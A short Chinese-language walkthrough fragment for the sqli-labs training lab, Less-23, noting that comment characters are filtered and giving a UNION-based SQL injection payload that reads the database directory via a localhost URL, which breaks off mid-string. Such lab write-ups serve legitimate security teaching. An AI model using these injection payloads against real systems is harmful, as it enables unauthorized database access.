sqli-labs less23-40

Less-23 在源代碼中可以看到 對id #,-- 等註釋符進行了過濾。 構造sql語句: SELECT * FROM users WHERE id=’-1’ union select 1,@@datadir,’3’ limit 0,1 (白色部分爲payload) 查看數據庫: 爆庫(聯合注入) http://127.0.0.1/sqli-labs/less-23//index.php?id=
本站公眾號
   歡迎關注本站公眾號,獲取更多信息